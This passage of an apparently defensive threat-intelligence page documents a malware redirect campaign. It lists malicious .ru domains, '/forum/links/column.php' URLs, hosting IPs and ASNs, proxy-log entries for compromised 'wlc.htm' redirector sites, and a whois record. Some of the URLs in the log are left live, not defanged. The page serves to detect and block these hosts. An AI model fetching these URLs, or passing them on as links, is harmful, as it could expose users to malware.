<td height="20" style="height: 15.0pt;">hxxp://dimanakasono.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dmpsonthh.ru:8080/forum/links/public_version.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dmssmgf.ru</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dmssmgf.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dozakialko.ru</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dozakialko.ru/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dozakialko.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dumarianoko.ru:8080/forum/links/public_version.php</td>
<td>91.224.135.20</td>
</tr>
</tbody></table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 712px;"><colgroup><col style="mso-width-alt: 23698; mso-width-source: userset; width: 486pt;" width="648"></col><col style="width: 48pt;" width="64"></col></colgroup><tbody></tbody></table>
<br />
<br />
<b>Similar Types hosted at:</b><br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 626px;">
<colgroup><col style="mso-width-alt: 20553; mso-width-source: userset; width: 422pt;" width="562"></col>
<col style="width: 48pt;" width="64"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 422pt;" width="562">hxxp://212.112.207.15:8080/forum/links/column.php</td>
<td style="width: 48pt;" width="64">212.112.207.15</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://belnialamsik.ru:8080/forum/links/column.php</td>
<td>187.85.160.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dekamerionka.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://demoralization.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dfudont.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dimanakasono.ru:8080/forum/links/column.php</td>
<td>187.85.160.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dmeiweilik.ru:8080/forum/links/column.php</td>
<td>187.85.160.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dmssmgf.ru:8080/forum/links/column.php</td>
<td>89.111.176.125</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dopaminko.ru:8080/forum/links/column.php</td>
<td>212.112.207.15</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dozakialko.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
</tbody></table>
<br />
<br />
<b>Recent IP Addresses Hosting This Garbage:</b><br />
<b><br /></b>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 626px;">
<colgroup><col style="mso-width-alt: 9216; mso-width-source: userset; width: 189pt;" width="252"></col>
<col style="mso-width-alt: 13677; mso-width-source: userset; width: 281pt;" width="374"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 189pt;" width="252"><b><u>IP</u></b></td>
<td style="width: 281pt;" width="374"><b><u>Hoster</u></b></td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl65" height="20" style="height: 15.0pt; width: 189pt;" width="252">187.85.160.106</td>
<td class="xl66" style="border-left: none;">AS28343</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl65" height="20" style="border-top: none; height: 15.0pt; width: 189pt;" width="252">212.112.207.15</td>
<td class="xl66" style="border-left: none; border-top: none;">AS702</td>
</tr>
<tr height="21" style="height: 15.75pt;">
<td class="xl67" height="21" style="border-top: none; height: 15.75pt; width: 189pt;" width="252">82.165.193.26</td>
<td class="xl68" style="border-left: none; border-top: none;">AS8560-MNT</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl71" height="20" style="height: 15.0pt; width: 189pt;" width="252">89.111.176.125</td>
<td class="xl72">address:
Garant-Park-Telecom, Ltd</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl73" height="20" style="height: 15.0pt;"> </td>
<td class="xl74">address:
Alexander Panov</td>
</tr>
<tr height="21" style="height: 15.75pt;">
<td class="xl75" height="21" style="height: 15.75pt;"> </td>
<td class="xl76">address: Moscow
State University</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl69" height="20" style="height: 15.0pt; width: 189pt;" width="252">91.224.135.20</td>
<td class="xl70" style="border-left: none;">AS56413</td>
</tr>
</tbody></table>
<br />
<b><br /></b>
<b>Historical IPs Hosting "/forum/links/column.php"</b><br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 251px;">
<colgroup><col style="mso-width-alt: 6838; mso-width-source: userset; width: 140pt;" width="187"></col>
<col style="width: 48pt;" width="64"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 140pt;" width="187">103.6.238.9</td>
<td style="width: 48pt;" width="64">AS132197</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">120.138.20.54</td>
<td>AS45179</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">187.85.160.106</td>
<td>AS28343</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">190.10.14.196</td>
<td>AS3790</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">202.180.221.186</td>
<td>AS24496</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">202.3.245.13</td>
<td>AS9471</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">203.80.16.81</td>
<td>AS24514</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">208.87.243.131</td>
<td>AS40676</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">209.51.221.247</td>
<td>AS10297</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">212.112.207.15</td>
<td>AS702</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">212.162.52.180</td>
<td>AS9829</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">216.24.194.66</td>
<td>AS40676</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">216.24.196.66</td>
<td>AS40676</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">42.121.116.38</td>
<td>AS37963</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">68.67.42.41</td>
<td>AS22652</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">72.18.203.140</td>
<td>AS26277</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">75.148.242.70</td>
<td>AS33662</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">79.98.27.9</td>
<td>AS47205</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">82.165.193.26</td>
<td>AS8560</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">89.111.176.125</td>
<td>AS41126</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">91.142.208.144</td>
<td>AS12860</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">91.224.135.20</td>
<td>AS56413</td>
</tr>
</tbody></table>
<br />
<b><br /></b>
<br />
<b>Alphabetical list of reported/known domains hosting this pattern:</b><br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 146px;">
<colgroup><col style="mso-width-alt: 5339; mso-width-source: userset; width: 110pt;" width="146"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 110pt;" width="146">187.85.160.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">202.180.221.186</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">203.80.16.81</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">208.87.243.131</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">42.121.116.38</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">analunakis.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">anifkailood.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">apendiksator.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">appleonliner.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">aseniakrol.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">aviaonlolsio.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">awoeionfpop.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">bakface.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">bamanaco.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">belnialamsik.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">bunakaranka.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">canadianpanakota.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">ceredinopl.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">cinemaallon.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">controlleramo.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">danadala.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">delemiator.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">demoralization.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">dfudont.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">dimanakasono.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">dimarikanko.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">dmssmgf.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">donkihotik.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">dopaminko.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">dozakialko.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">efaxinok.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">feronialopam.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">fidelocastroo.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">finitolaco.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">fionadix.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">forumibiza.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">francese.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">ganadeion.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">ganiopatia.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">geforceexlusive.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">genevaonline.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">gurmanikia.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hamasutra.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">kennedyana.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">kiladopje.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">leberiasun.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">lentuiax.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">leprasmotra.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">linkrdin.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">manekenppa.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">monacofrm.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">moneymakergrow.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">panalkinew.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">panamechkis.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">panasonicviva.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">pelamutrika.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">peneloipin.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">podarunoki.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">ponowseniks.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">secondhand4u.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">veneziolo.ru</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">windowsmobilever.ru</td>
</tr>
</tbody></table>
<br />
<b><br /></b>
<b>Recently Checked Known Redirectors - if they are live (Sites followed immediately by a red color are live)</b><br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 693px;">
<colgroup><col style="mso-width-alt: 5705; mso-width-source: userset; width: 117pt;" width="156"></col>
<col style="mso-width-alt: 1280; mso-width-source: userset; width: 26pt;" width="35"></col>
<col style="mso-width-alt: 2450; mso-width-source: userset; width: 50pt;" width="67"></col>
<col style="mso-width-alt: 15908; mso-width-source: userset; width: 326pt;" width="435"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 117pt;" width="156">TCP_IMS_HIT/304</td>
<td align="right" style="width: 26pt;" width="35">320</td>
<td style="width: 50pt;" width="67">GET</td>
<td style="width: 326pt;" width="435">http://bartinemusicstudio.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">341</td>
<td>GET</td>
<td>http://galantvisa.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/403</td>
<td align="right">561</td>
<td>GET</td>
<td>http://ceratofortekoup.sg/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">569</td>
<td>GET</td>
<td>http://limavirtual.unicordoba.edu.co/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">325</td>
<td>GET</td>
<td>http://www.shadownessence.net/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">462</td>
<td>GET</td>
<td>http://www.rovere.lu/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://taleemindia.org/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">467</td>
<td>GET</td>
<td>http://schetchik-grand.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">3952</td>
<td>GET</td>
<td>http://aanchalfoundation.org/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">468</td>
<td>GET</td>
<td>http://www.telemirspb.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/301</td>
<td align="right">570</td>
<td>GET</td>
<td>http://ktakademija.lt/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">293</td>
<td>GET</td>
<td>http://thekla-kampelmann.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_NEGATIVE_HIT/404</td>
<td align="right">476</td>
<td>GET</td>
<td>http://schetchik-grand.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/500</td>
<td align="right">798</td>
<td>GET</td>
<td>http://banner.terrarium.pl/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">327</td>
<td>GET</td>
<td>http://eens.econz.net/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">320</td>
<td>GET</td>
<td>http://e-hydromax.pl/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">343</td>
<td>GET</td>
<td>http://test-dm.designcon.tmweb.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_NEGATIVE_HIT/404</td>
<td align="right">471</td>
<td>GET</td>
<td>http://www.rovere.lu/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://taleemindia.org/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/200</td>
<td align="right">661</td>
<td>GET</td>
<td>http://www.fonlider.rs/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://gurupra.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">320</td>
<td>GET</td>
<td>http://algamish.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">320</td>
<td>GET</td>
<td>http://ismmania.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://jayhawksbasketball.ca/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">468</td>
<td>GET</td>
<td>http://www.miel-baumanskaya.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">327</td>
<td>GET</td>
<td>http://avatar-italia.it/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
</tbody></table>
<br />
<br />
<br />
<b>Whois - I'm loving the gmail address</b><br />
<br />
<h3 style="color: #002b82; font-family: Arial, Helvetica, Verdana, sans-serif; font-size: 18px; line-height: 0; margin-top: 40px;">
Network Whois record</h3>
<div style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px;">
Queried <span class="ipaddr" style="color: #002b82; font-weight: bold;">whois.ripe.net</span> with "<span class="ipaddr" style="color: #002b82; font-weight: bold;">-B 91.224.135.20</span>"...</div>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">% Information related to '91.224.134.0 - 91.224.135.255'
inetnum: 91.224.134.0 - 91.224.135.255
netname: PROSERVIS-NET
descr: Proservis UAB
country: LT
org: ORG-UP13-RIPE
admin-c: PJ2859-RIPE
tech-c: MD138-RIPE
status: ASSIGNED PI
notify: ipas.master@gmail.com
mnt-by: RIPE-NCC-END-MNT
mnt-by: MNT-ALFATELECOM
mnt-by: MNT-PROSERVIS-LT
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: MNT-PROSERVIS-LT
mnt-domains: MNT-PROSERVIS-LT
changed: ipas.master@gmail.com 20110302
source: RIPE
</pre>
<div>
<br /></div>
<div>
<br /></div>
<br />
<br />
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">route: 91.224.134.0/23
descr: PROSERVIS
origin: AS56413
mnt-by: MNT-PROSERVIS-LT
changed: marius@proservis.lt 20110405
source: RIPE</pre>
<br />
<b><br /></b>
<b>Reported Recent Redirectors</b><br />
<b><i><span style="font-size: xx-small;">Note, other redirectors are possible. </span></i></b><br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 383px;">
<colgroup><col style="mso-width-alt: 11666; mso-width-source: userset; width: 239pt;" width="319"></col>
<col style="width: 48pt;" width="64"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
